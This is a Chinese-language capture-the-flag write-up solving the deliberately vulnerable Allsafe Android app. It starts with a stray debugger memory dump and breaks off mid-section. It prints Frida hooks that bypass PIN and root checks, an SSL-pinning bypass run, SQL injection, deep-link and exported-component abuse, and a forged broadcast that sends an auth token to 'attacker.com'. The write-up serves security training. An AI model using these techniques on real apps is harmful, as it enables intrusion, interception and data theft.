0xa7 0x42 0xce 0x7f 0xd1 0x3e 0x55555555b3ee: 0x0a 0xb2 0x1a 0x7e 0x54 0xb7 0x0a 0xe8 0x55555555b3f6: 0x76 0xfd 0xb6 0x64 0xcd 0x9d 0xaf 0x98 0x55555555b3fe: 0x4b 0x81 0x88 0x58 0x57 0x54 0x59 0xa4 0x55555555b406: 0x19 0x87 0xfc 0xe9 0xe9 0xe9 0xe9 0xe9 pwndbg&gt; x/48bx 0x55555555b3ce 0x55555555b3ce: 0xa4 0x7c 0x3b 0x3f 0x49 0x90 0xc8 0xeb 0x55555555b3d6: 0xa7 0x41 0xf5 0x5d 0xa9 0x31 0x2a 0x1f 0x55555555b3de: 0x80 0x2f 0xef 0xfe 0x80 0xbe 0x3d 0x7e 0x55555555b3e6: 0x27 0x96 0xa7 0x42 0xce 0x7f 0xd1 0x3e 0x55555555b3ee: 0x0a 0xb2 0x1a 0x7e 0x54 0xb7 0x0a 0xe8 0x55555555b3f6: 0x76 0xfd 0xb6 0x64 0xcd 0x9d 0xaf 0x98 </code></pre> Allsafe 靶场练习 WriteUphttps://blog-5w0.pages.dev/posts/allsafe/https://blog-5w0.pages.dev/posts/allsafe/Allsafe 靶场练习 WriteUp CTF WriteUpSun, 02 Nov 2025 00:00:00 GMT<h1>Insecure Logging 不安全的日志记录</h1> <p>这个第一个挑战就是这个apk的日志信息泄露</p> <p>用adb logcat查看日志信息,然后输入一个尝试密码‘weixiaoking’</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-01.png" alt="Figure 1" /></p> <p>在日志里面就可以看到,所以如果输入的正确密码,可能存在信息泄露</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-02.png" alt="Figure 2" /></p> <p>是源于此代码</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-03.png" alt="Figure 3" /></p> <h1>Hardcoded Credentials 硬编码凭证</h1> <p>这一关就是说有一些硬编码的泄露</p> <p>第一处内容为admin:psaaword123</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-04.png" alt="Figure 4" /></p> <p>第二处</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-05.png" alt="Figure 5" /></p> <h1>&lt;font style="color:rgb(36, 36, 36);"&gt;Firebase Database: Firebase 数据库&lt;/font&gt;</h1> <p><strong>漏洞描述:</strong></p> <p>Firebase 数据库漏洞源于开发者未能为其 Firebase 实时数据库或 Firestore 配置提供充分的访问控制。Firebase 实时数据库以 REST API 的形式运行,可通过在 URL 后添加 .json 访问;如果读写权限设置为“任何人”,未经身份验证的攻击者即可直接访问数据库。</p> <p>在使用apkleaks对这个apk进行扫描时,发现这个apk确实用了Firebase</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-06.png" alt="Figure 6" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-07.png" alt="Figure 7" /></p> <p>在jadx中搜索,url为<a href="https://allsafe-8cef0.firebaseio.com">https://allsafe-8cef0.firebaseio.com</a></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-08.png" alt="Figure 8" /></p> <p>在url后加上/.json</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-09.png" alt="Figure 9" /></p> <h1>Insecure Shared Preferences不安全的共享偏好</h1> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-10.png" alt="Figure 10" /></p> <p><strong>漏洞描述 :</strong></p> <p>当 Android 应用程序使用 SharedPreferences 机制存储敏感数据(例如用户名、密码、令牌、API 密钥、信用卡信息等)而未进行加密或缺乏足够的访问控制时,就会出现不安全的 Shared Preferences 漏洞。如果设备已获得 root 权限或运行恶意应用程序,则这些数据很容易被访问、读取和篡改。这可能导致用户数据被盗、身份验证被绕过或帐户被劫持。</p> <p>每个应用都有自己的shared_prefs目录,通常位于/data/data/&lt;包名&gt;/shared_prefs/</p> <p>我先随便设置一下用户名与密码</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-11.png" alt="Figure 11" /></p> <p>现在去MT管理器查看</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-12.png" alt="Figure 12" /></p> <h1>SQL Injection SQL 注入</h1> <p><strong>漏洞定义 :</strong></p> <p>SQL 注入漏洞是指应用程序在未进行充分验证或过滤的情况下,直接将从用户接收的数据包含在 SQL 查询中。攻击者可以使用精心构造的输入(有效载荷)来获取对数据库的未经授权的访问权限,造成数据泄露,修改或删除数据,在某些情况下甚至可以在应用程序运行的服务器上执行命令。这种漏洞常见于 Web 应用程序、API 或移动应用程序的后端服务中。</p> <p>源码</p> <pre><code> public static final void onCreateView$lambda$0(SQLiteDatabase $db, TextInputEditText $username, SQLInjection this$0, TextInputEditText $password, View it) throws NoSuchAlgorithmException { Cursor cursor = $db.rawQuery("select * from user where username = '" + ((Object) $username.getText()) + "' and password = '" + this$0.md5(String.valueOf($password.getText())) + "'", null); Intrinsics.checkNotNullExpressionValue(cursor, "rawQuery(...)"); StringBuilder data = new StringBuilder(); if (cursor.getCount() &gt; 0) { cursor.moveToFirst(); do { String user = cursor.getString(1); String pass = cursor.getString(2); data.append("User: " + user + " \nPass: " + pass + "\n"); } while (cursor.moveToNext()); } cursor.close(); Toast.makeText(this$0.getContext(), data, 1).show(); } </code></pre> <p>利用sql语句漏洞,获得了所有用户的用户名与密码</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-13.png" alt="Figure 13" /></p> <h1>PIN Bypass PIN 码旁路</h1> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-14.png" alt="Figure 14" /></p> <p><strong>漏洞描述 :</strong></p> <p>PIN 码绕过漏洞是一种安全缺陷,它允许应用程序或设备绕过用户 PIN 码(个人识别码)验证,或被他人绕过。</p> <p>找到源码,其实pin码已经硬编码在代码里了,我们可以直接对其进行base64解码得到4863</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-15.png" alt="Figure 15" /></p> <p>但这关是要让我们使用Frida来过关,我的思路是不验证随便输入一个都能通过验证,这需要我们来对验证函数进行挂钩</p> <pre><code>Java.perform(function(){ const pin=Java.use("infosecadventures.allsafe.challenges.PinBypass"); pin.checkPin.implementation = function (pin){ return true; } }) </code></pre> <pre><code>PS C:\Users\35159&gt; frida -U -N infosecadventures.allsafe -l E:\ctf\linghsi\hook.js ____ / _ | Frida 17.8.0 - A world-class dynamic instrumentation toolkit | (_| | &gt; _ | Commands: /_/ |_| help -&gt; Displays the help system . . . . object? -&gt; Display information about 'object' . . . . exit/quit -&gt; Exit . . . . . . . . More info at https://frida.re/docs/home/ . . . . . . . . Connected to Android Emulator 5554 (id=emulator-5554) [Android Emulator 5554::infosecadventures.allsafe ]-&gt; </code></pre> <p>即使我输的不是4863,也会通过</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-16.png" alt="Figure 16" /></p> <h1>Root Detection 根检测</h1> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-17.png" alt="Figure 17" /></p> <p><strong>漏洞描述 :</strong></p> <p>Root 检测绕过漏洞允许攻击者绕过 Android 应用程序中开发者添加的用于检测设备是否已 root 的检查机制。通常情况下,应用程序应被禁止在已 root 的设备上运行,或者需要提高安全级别。然而,这些检查机制的薄弱或错误实现使得攻击者能够操纵 root 检测机制,从而使应用程序能够在已 root 的设备上运行,并禁用安全措施。</p> <p>源码</p> <pre><code>public static final void onCreateView$lambda$0(RootDetection this$0, View it) { if (new RootBeer(this$0.getContext()).isRooted()) { SnackUtil snackUtil = SnackUtil.INSTANCE; FragmentActivity fragmentActivityRequireActivity = this$0.requireActivity(); Intrinsics.checkNotNullExpressionValue(fragmentActivityRequireActivity, "requireActivity(...)"); snackUtil.simpleMessage(fragmentActivityRequireActivity, "Sorry, your device is rooted!"); return; } SnackUtil snackUtil2 = SnackUtil.INSTANCE; FragmentActivity fragmentActivityRequireActivity2 = this$0.requireActivity(); Intrinsics.checkNotNullExpressionValue(fragmentActivityRequireActivity2, "requireActivity(...)"); snackUtil2.simpleMessage(fragmentActivityRequireActivity2, "Congrats, root is not detected!"); } } </code></pre> <p>hook脚本,使用的类com.scottyab.rootbeer.RootBeer</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-18.png" alt="Figure 18" /></p> <pre><code>Java.perform(function(){ var rootdetection=Java.use("com.scottyab.rootbeer.RootBeer"); rootdetection.isRooted.implementation = function (){ return false; } }) </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-19.png" alt="Figure 19" /></p> <p>现在来检测即使我们设备已经root了,也检测不到</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-20.png" alt="Figure 20" /></p> <h1>Deep Link Exploitation 深度链接利用</h1> <p><strong>漏洞描述 :</strong></p> <p>深度链接利用漏洞源于移动应用程序中使用的深度链接机制未能得到安全验证。深度链接允许用户直接重定向到应用程序的特定屏幕或功能。如果应用程序在处理通过深度链接接收的参数或调用时缺乏足够的身份验证和授权控制,攻击者就可以通过精心构造的链接访问应用程序的关键功能。这会导致一系列安全风险,例如未经授权的用户修改帐户设置、在未登录的情况下被重定向到授权屏幕,或触发敏感操作。</p> <p>源码定位</p> <pre><code>public class DeepLinkTask extends AppCompatActivity { @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_deep_link_task); Intent intent = getIntent(); String action = intent.getAction(); Uri data = intent.getData(); Log.d("ALLSAFE", "Action: " + action + " Data: " + data); try { if (data.getQueryParameter("key").equals(getString(R.string.key))) { findViewById(R.id.container).setVisibility(0); SnackUtil.INSTANCE.simpleMessage(this, "Good job, you did it!"); } else { SnackUtil.INSTANCE.simpleMessage(this, "Wrong key, try harder!"); } } catch (Exception e) { SnackUtil.INSTANCE.simpleMessage(this, "No key provided!"); Log.e("ALLSAFE", e.getMessage()); } } } </code></pre> <p>我们先去string.xml里找到内置的key</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-21.png" alt="Figure 21" /></p> <p>url的具体格式要看AndroidManifest.xml里的这个Activity的intent-filter</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-22.png" alt="Figure 22" /></p> <p>在 Android 应用程序中测试深度链接最常用的命令之一是 <code>adb shell am start</code>。</p> <pre><code>adb shell am start -W -a android.intent.action.VIEW -d "deeplink://parametre?query=key" com.hedef.uygulama </code></pre> <p><code>adb shell am start</code> → 通过 Activity Manager 启动一个新的 intent。</p> <p>-W → 等待命令完成</p> <p>-a android.intent.action.VIEW → 动作中的意图(在通用视图中进行深度链接)。</p> <p>-d "deeplink://..." → 深度链接 URI(根据具体情况,此处会写入 URL 或自定义方案)。</p> <p>com.target.application → 目标应用程序的包名。</p> <p>根据我们上面找到的信息</p> <pre><code>scheme--&gt;allsafe(方案) host--&gt;infosecadventures(主机) pathPrefix--&gt;/congrats(路径前缀) 软件包名称--&gt;infosecadventures.allsafe key--&gt;ebfb7ff0-b2f6-41c8-bef3-4fba17be410c </code></pre> <p>总和下来命令为</p> <pre><code>adb shell am start -W -a android.intent.action.VIEW -d "allsafe://infosecadventures/congrats?key=ebfb7ff0-b2f6-41c8-bef3-4fba17be410c" infosecadventures.allsafe </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-23.png" alt="Figure 23" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-24.png" alt="Figure 24" /></p> <h1>Insecure Broadcast Receiver 不安全的广播接收器</h1> <p><strong>漏洞描述 :</strong></p> <p>当 Android 应用中使用的广播接收器组件未进行适当的安全控制或未启用安全设置时,就会出现不安全的广播接收器漏洞。如果广播接收器被标记为 exports="true" 且未应用任何授权控制,其他应用或攻击者可以向该接收器发送恶意广播意图消息。这可能导致应用内触发未经授权的操作、访问敏感信息或出现意外的应用行为。</p> <p>在AndroidMainfest.xml文件里确定确实是导出状态</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-25.png" alt="Figure 25" /></p> <p>去看源码</p> <pre><code>public class NoteReceiver extends BroadcastReceiver { @Override // android.content.BroadcastReceiver public void onReceive(Context context, Intent intent) { String server = intent.getStringExtra("server"); String note = intent.getStringExtra("note"); String notification_message = intent.getStringExtra("notification_message"); OkHttpClient okHttpClient = new OkHttpClient.Builder().build(); HttpUrl httpUrl = new HttpUrl.Builder().scheme("http").host(server).addPathSegment("api").addPathSegment("v1").addPathSegment("note").addPathSegment("add").addQueryParameter("auth_token", "YWxsc2FmZV9kZXZfYWRtaW5fdG9rZW4=").addQueryParameter("note", note).build(); Log.d("ALLSAFE", httpUrl.getUrl()); Request request = new Request.Builder().url(httpUrl).build(); okHttpClient.newCall(request).enqueue(new Callback(this) { // from class: infosecadventures.allsafe.challenges.NoteReceiver.1 @Override // okhttp3.Callback public void onFailure(Call call, IOException e) { Log.d("ALLSAFE", e.getMessage()); } @Override // okhttp3.Callback public void onResponse(Call call, Response response) throws IOException { Log.d("ALLSAFE", ((ResponseBody) Objects.requireNonNull(response.body())).string()); } }); NotificationCompat.Builder builder = new NotificationCompat.Builder(context, "ALLSAFE"); builder.setContentTitle("Notification from Allsafe"); builder.setContentText(notification_message); builder.setSmallIcon(R.mipmap.ic_launcher_round); builder.setAutoCancel(true); builder.setChannelId("ALLSAFE"); Notification notification = builder.build(); NotificationManager notificationManager = (NotificationManager) context.getSystemService("notification"); NotificationChannel notificationChannel = new NotificationChannel("ALLSAFE", "ALLSAFE_NOTIFICATION", 4); notificationManager.createNotificationChannel(notificationChannel); notificationManager.notify(1, notification); } } </code></pre> <p>先来分析一下吧</p> <p>从广播里取参数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-26.png" alt="Figure 26" /></p> <p>发一个HTTP请求</p> <pre><code> HttpUrl httpUrl = new HttpUrl.Builder().scheme("http").host(server).addPathSegment("api").addPathSegment("v1").addPathSegment("note").addPathSegment("add").addQueryParameter("auth_token", "YWxsc2FmZV9kZXZfYWRtaW5fdG9rZW4=").addQueryParameter("note", note).build(); </code></pre> <p>组合在一起,最终http长这样</p> <pre><code>http://&lt;server&gt;/api/v1/note/add?auth_token=YWxsc2FmZV9kZXZfYWRtaW5fdG9rZW4=&amp;note=&lt;note&gt; </code></pre> <p>异步发送</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-27.png" alt="Figure 27" /></p> <p>伪造命令</p> <pre><code>adb shell am broadcast -n infosecadventures.allsafe/.challenges.NoteReceiver -a infosecadventures.allsafe.action.PROCESS_NOTE --es server "attacker.com" --es note "hacked_by_me" --es notification_message "Hacked" </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-28.png" alt="Figure 28" /></p> <h1>Vulnerable WebView 存在漏洞的 WebView</h1> <p><strong>漏洞描述 :</strong></p> <p>应用程序中使用的 WebView 组件通过 loadUrl() 和 loadData() 方法处理用户输入的数据,而未进行任何验证或过滤。loadUrl() 函数直接执行用户提供的 URL,而 loadData() 函数处理输入的 HTML/JavaScript 代码并将其渲染到浏览器引擎中。此外,使用 setJavaScriptEnabled(true) 允许攻击者执行恶意 JavaScript 代码。这可能使恶意用户能够在应用程序内执行 XSS 攻击、重定向到恶意网页或篡改应用程序内的数据。</p> <p>源代码</p> <p>输入框里的内容要么被当成 URL 打开,要么被当成 HTML 直接渲染</p> <pre><code>public class VulnerableWebView extends Fragment { @Override // androidx.fragment.app.Fragment public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { View view = inflater.inflate(R.layout.fragment_vulnerable_web_view, container, false); final TextInputEditText payload = (TextInputEditText) view.findViewById(R.id.payload); final WebView webView = (WebView) view.findViewById(R.id.webView); webView.setWebViewClient(new WebViewClient()); WebSettings settings = webView.getSettings(); settings.setJavaScriptEnabled(true); settings.setAllowFileAccess(true); settings.setLoadWithOverviewMode(true); settings.setSupportZoom(true); view.findViewById(R.id.execute).setOnClickListener(new View.OnClickListener() { // from class: infosecadventures.allsafe.challenges.VulnerableWebView$$ExternalSyntheticLambda0 @Override // android.view.View.OnClickListener public final void onClick(View view2) { this.f$0.lambda$onCreateView$0(payload, webView, view2); } }); return view; } /* JADX INFO: Access modifiers changed from: private */ public /* synthetic */ void lambda$onCreateView$0(TextInputEditText payload, WebView webView, View v) { if (!((Editable) Objects.requireNonNull(payload.getText())).toString().isEmpty()) { if (URLUtil.isValidUrl(((Editable) Objects.requireNonNull(payload.getText())).toString())) { webView.loadUrl(payload.getText().toString()); return; } else { webView.setWebChromeClient(new WebChromeClient()); webView.loadData(payload.getText().toString(), "text/html", "UTF-8"); return; } } SnackUtil.INSTANCE.simpleMessage(requireActivity(), "No payload provided!"); } } </code></pre> <p>题目要求</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-29.png" alt="Figure 29" /></p> <p>先输入一个正常的url</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-30.png" alt="Figure 30" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-31.png" alt="Figure 31" /></p> <p>这里说明允许webview访问设备的文件系统,意味着webview可以访问使用file://URL方案打开的本地文件</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-32.png" alt="Figure 32" /></p> <p>也可以</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-33.png" alt="Figure 33" /></p> <h1>Certificate Pinning 证书别针</h1> <p><strong>漏洞描述 :</strong></p> <p>移动应用程序中用于 SSL/TLS 证书验证的证书固定机制可被绕过。通常,证书固定机制确保客户端和服务器之间的通信仅信任特定的证书,从而防止中间人攻击 (MitM)。然而,如果应用程序中的此控制被绕过,攻击者可以使用逆向工程、运行时钩子(Frida、Xposed)或薄弱的证书固定实现来解密 SSL 流量。这会削弱应用程序的安全通信机制,并允许攻击者拦截本应加密的数据(用户名、密码、令牌、会话信息等)。</p> <p>运行一下frida codeshare里的SSL证书验证绕过脚本</p> <pre><code>PS C:\Users\35159&gt; frida -U --codeshare Q0120S/bypass-ssl-pinning -f infosecadventures.allsafe ____ / _ | Frida 17.8.0 - A world-class dynamic instrumentation toolkit | (_| | &gt; _ | Commands: /_/ |_| help -&gt; Displays the help system . . . . object? -&gt; Display information about 'object' . . . . exit/quit -&gt; Exit . . . . . . . . More info at https://frida.re/docs/home/ . . . . . . . . Connected to Android Emulator 5554 (id=emulator-5554) Spawning `infosecadventures.allsafe`... Hello! This is the first time you're running this particular snippet, or the snippet's source code has changed. Project Name: Bypass SSL Pinning Author: @Q0120S Slug: Q0120S/bypass-ssl-pinning Fingerprint: ac76d00550025da4fbca5adaf93948a773ed982c9b53baa44e13e437bbef401e URL: https://codeshare.frida.re/@Q0120S/bypass-ssl-pinning Are you sure you'd like to trust this project? [y/N] y Adding fingerprint ac76d00550025da4fbca5adaf93948a773ed982c9b53baa44e13e437bbef401e to the trust store! You won't be prompted again unless the code changes. Spawned `infosecadventures.allsafe`. Resuming main thread! [Android Emulator 5554::infosecadventures.allsafe ]-&gt; --- Unpinning Android app... [+] SSLPeerUnverifiedException auto-patcher [+] HttpsURLConnection (setDefaultHostnameVerifier) [+] HttpsURLConnection (setSSLSocketFactory) [+] HttpsURLConnection (setHostnameVerifier) [+] SSLContext [+] TrustManagerImpl [+] OkHTTPv3 (list) [ ] OkHTTPv3 (cert) [+] OkHTTPv3 (cert array) [+] OkHTTPv3 ($okhttp) [ ] Trustkit OkHostnameVerifier(SSLSession) [ ] Trustkit OkHostnameVerifier(cert) [ ] Trustkit PinningTrustManager [ ] Appcelerator PinningTrustManager [ ] OpenSSLSocketImpl Conscrypt [ ] OpenSSLEngineSocketImpl Conscrypt [ ] OpenSSLSocketImpl Apache Harmony [ ] PhoneGap sslCertificateChecker [ ] IBM MobileFirst pinTrustedCertificatePublicKey (string) [ ] IBM MobileFirst pinTrustedCertificatePublicKey (string array) [ ] IBM WorkLight HostNameVerifierWithCertificatePinning (SSLSocket) [ ] IBM WorkLight HostNameVerifierWithCertificatePinning (cert) [ ] IBM WorkLight HostNameVerifierWithCertificatePinning (string string) [ ] IBM WorkLight HostNameVerifierWithCertificatePinning (SSLSession) [ ] Conscrypt CertPinManager [ ] CWAC-Netsecurity CertPinManager [ ] Worklight Androidgap WLCertificatePinningPlugin [ ] Netty FingerprintTrustManagerFactory [ ] Squareup CertificatePinner (cert) [ ] Squareup CertificatePinner (list) [ ] Squareup OkHostnameVerifier (cert) [ ] Squareup OkHostnameVerifier (SSLSession) [+] Android WebViewClient (SslErrorHandler) [ ] Android WebViewClient (WebResourceError) [ ] Apache Cordova WebViewClient [ ] Boye AbstractVerifier [ ] Appmattus (CertificateTransparencyInterceptor) [ ] Appmattus (CertificateTransparencyTrustManager) </code></pre> <p>再点击发送请求,BurpSuite就可以拦截到</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-34.png" alt="Figure 34" /></p> <h1>Weak Cryptography 弱密码学</h1> <p><strong>漏洞描述 :</strong></p> <p>该应用程序使用不安全的加密方法来加密和维护敏感数据的完整性。</p> <p>先看源码</p> <p>固定密钥(KEY = "1nf053c4dv3n7ur3")</p> <p>AES加密使用ECB模式</p> <p>使用了MD5算法</p> <pre><code>public class WeakCryptography extends Fragment { public static final String KEY = "1nf053c4dv3n7ur3"; public static String encrypt(String value) { try { SecretKeySpec secretKeySpec = new SecretKeySpec(KEY.getBytes(StandardCharsets.UTF_8), "AES"); Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5PADDING"); cipher.init(1, secretKeySpec); byte[] encrypted = cipher.doFinal(value.getBytes()); return new String(encrypted); } catch (InvalidKeyException | NoSuchAlgorithmException | BadPaddingException | IllegalBlockSizeException | NoSuchPaddingException e) { e.printStackTrace(); return null; } } public static String md5Hash(String text) { StringBuilder stringBuilder = new StringBuilder(); try { MessageDigest digest = MessageDigest.getInstance("MD5"); digest.update(text.getBytes()); byte[] messageDigest = digest.digest(); stringBuilder.append(String.format("%032X", new BigInteger(1, messageDigest))); } catch (Exception e) { Log.d("ALLSAFE", e.getLocalizedMessage()); } return stringBuilder.toString(); } </code></pre> <h1>&lt;font style="color:rgb(36, 36, 36);"&gt;Insecure Service不安全的服务&lt;/font&gt;</h1> <p>主要原因就是,状态是可导出的,这意味着可以直接从终端调用它,而无需通过用户界面。这意味着任何恶意应用程序都可以利用此行为调用该服务并录制受害者的音频。</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-35.png" alt="Figure 35" /></p> <p>使用drozer都能扫到</p> <pre><code>(.venv) PS E:\android\drozer&gt; drozer console connect Selecting 636b8e9b5dcaa8b2 (BlackShark SHARK PAR-A0 9) .. ..:. ..o.. .r.. ..a.. . ....... . ..nd ro..idsnemesisand..pr .otectorandroidsneme. .,sisandprotectorandroids+. ..nemesisandprotectorandroidsn:. .emesisandprotectorandroidsnemes.. ..isandp,..,rotecyayandro,..,idsnem. .isisandp..rotectorandroid..snemisis. ,andprotectorandroidsnemisisandprotec. .torandroidsnemesisandprotectorandroid. .snemisisandprotectorandroidsnemesisan: .dprotectorandroidsnemesisandprotector. drozer Console (v3.1.0) </code></pre> <pre><code>dz&gt; run app.package.attacksurface infosecadventures.allsafe Attempting to run shell module Attack Surface: 3 activities exported 2 broadcast receivers exported 1 content providers exported 1 services exported is debuggable dz&gt; run app.service.info -a infosecadventures.allsafe Attempting to run shell module Package: infosecadventures.allsafe infosecadventures.allsafe.challenges.RecorderService Permission: null </code></pre> <p>外部访问就行</p> <pre><code>PS C:\Users\35159&gt; adb shell am startservice infosecadventures.allsafe/.challenges.RecorderService Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=infosecadventures.allsafe/.challenges.RecorderService } </code></pre> <p>&lt;!-- 这是一张图片,ocr 内容为:FILE://STORAGE/EMULATED/DOWNLOAD/ALLSAFE_REC-20260403-160800743.MP3 --&gt; <img src="./images/img-36.png" alt="Figure 36" /></p> <h1>&lt;font style="color:rgb(36, 36, 36);"&gt;Object Serialization对象序列化&lt;/font&gt;</h1> <p><strong>漏洞描述:</strong></p> <p>该应用会创建一个包含 username 、 password 和 role User 对象。此对象使用 ObjectOutputStream 进行序列化,并以 user.dat 的名称保存在外部应用存储中,具体位置为 /sdcard/Android/data/infosecadventures.allsafe/files/ 。序列化允许将对象的状态写入文件,以便稍后检索。每个 User 对象都有一个 role 字段。默认情况下,该字段设置为 "ROLE_AUTHOR" 。如果用户的角色为 "ROLE_EDITOR" ,则授予其访问特定功能的权限;否则,拒绝访问。</p> <p>可利用的点就在这里, 他应用<strong>信任磁盘上的序列化数据,我们可以修改文件的role字段,从而绕过限制</strong></p> <p><strong>文件存放在</strong></p> <p>&lt;!-- 这是一张图片,ocr 内容为:SDCARD/ANDROID/DATA/INFOSECADVENTURES.ALLSAFE/FILES/ 文件夹:0 文件:2 储存:2.23G/49.32G USER.DAT 26-04-03 16:21 175B --&gt; <img src="./images/img-37.png" alt="Figure 37" /></p> <p>源码</p> <pre><code>package infosecadventures.allsafe.challenges; import android.os.Bundle; import android.text.Editable; import android.util.Log; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.widget.Button; import android.widget.Toast; import androidx.fragment.app.Fragment; import com.google.android.material.textfield.TextInputEditText; import infosecadventures.allsafe.R; import infosecadventures.allsafe.utils.SnackUtil; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.io.Serializable; import java.util.Objects; /* JADX INFO: loaded from: classes4.dex */ public class ObjectSerialization extends Fragment { @Override // androidx.fragment.app.Fragment public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { View view = inflater.inflate(R.layout.fragment_object_serialization, container, false); final TextInputEditText username = (TextInputEditText) view.findViewById(R.id.username); final TextInputEditText password = (TextInputEditText) view.findViewById(R.id.password); Button save = (Button) view.findViewById(R.id.save); Button load = (Button) view.findViewById(R.id.load); final String path = requireActivity().getExternalFilesDir(null) + "/user.dat"; save.setOnClickListener(new View.OnClickListener() { // from class: infosecadventures.allsafe.challenges.ObjectSerialization$$ExternalSyntheticLambda0 @Override // android.view.View.OnClickListener public final void onClick(View view2) { this.f$0.lambda$onCreateView$0(username, password, path, view2); } }); load.setOnClickListener(new View.OnClickListener() { // from class: infosecadventures.allsafe.challenges.ObjectSerialization$$ExternalSyntheticLambda1 @Override // android.view.View.OnClickListener public final void onClick(View view2) { this.f$0.lambda$onCreateView$1(path, view2); } }); return view; } /* JADX INFO: Access modifiers changed from: private */ public /* synthetic */ void lambda$onCreateView$0(TextInputEditText username, TextInputEditText password, String path, View v) { if (!((Editable) Objects.requireNonNull(username.getText())).toString().isEmpty() &amp;&amp; !((Editable) Objects.requireNonNull(password.getText())).toString().isEmpty()) { User user = new User(username.getText().toString(), password.getText().toString()); try { File file = new File(path); FileOutputStream fos = new FileOutputStream(file); ObjectOutputStream oos = new ObjectOutputStream(fos); oos.writeObject(user); oos.close(); fos.close(); } catch (IOException e) { Log.d("ALLSAFE", e.getLocalizedMessage()); } SnackUtil.INSTANCE.simpleMessage(requireActivity(), "User data successfully saved!"); return; } SnackUtil.INSTANCE.simpleMessage(requireActivity(), "Fill out the fields!"); } /* JADX INFO: Access modifiers changed from: private */ public /* synthetic */ void lambda$onCreateView$1(String path, View v) { if (new File(path).exists()) { try { File file = new File(path); FileInputStream fis = new FileInputStream(file); ObjectInputStream ois = new ObjectInputStream(fis); User user = (User) ois.readObject(); ois.close(); fis.close(); if (!user.role.equals("ROLE_EDITOR")) { SnackUtil.INSTANCE.simpleMessage(requireActivity(), "Sorry, only editors have access!"); } else { SnackUtil.INSTANCE.simpleMessage(requireActivity(), "Good job!"); Toast.makeText(requireContext(), user.toString(), 0).show(); } return; } catch (IOException | ClassNotFoundException e) { Log.d("ALLSAFE", e.getLocalizedMessage()); return; } } SnackUtil.INSTANCE.simpleMessage(requireActivity(), "File not found!"); } public static class User implements Serializable { String password; String role = "ROLE_AUTHOR"; String username; public User() { } public User(String username, String password) { this.username = username; this.password = password; } public String toString() { return "User{username='" + this.username + "', password='" + this.password + "', role='" + this.role + "'}"; } } } </code></pre> <p>打开文件</p> <p>&lt;!-- 这是一张图片,ocr 内容为:1:151 USER.DAT /ME @ @ DASSWORDTILLAVA/LANG/STRING/STRING/L USERNAMEQ~XPT 123456T 123456T ROLE AUTHORT WEIXIAO SR-INFOSECADVENTURES.ALLSAFE.CHALLENGES.OBJECTSERIALIZATION$USER --&gt; <img src="./images/img-38.png" alt="Figure 38" /></p> <p>直接修改保存</p> <p>&lt;!-- 这是一张图片,ocr 内容为:1:164 UTF-8 *USER.DAT --&gt; <img src="./images/img-39.png" alt="Figure 39" /></p> <p>这就意味着我们有了更高的权限</p> <h1>&lt;font style="color:rgb(36, 36, 36);"&gt;Insecure Providers不安全的提供商&lt;/font&gt;</h1> <p>&lt;!-- 这是一张图片,ocr 内容为:INSECURE PROVIDERS [HARD] EXPLOIT INSECURE CONTENT PROVIDERS [CHALLENGE 17] EXPLOIT PROVIDER MISSION BRIEFING WE GOT A REPORT THAT OUR NOTES DATABASE LEA ASE 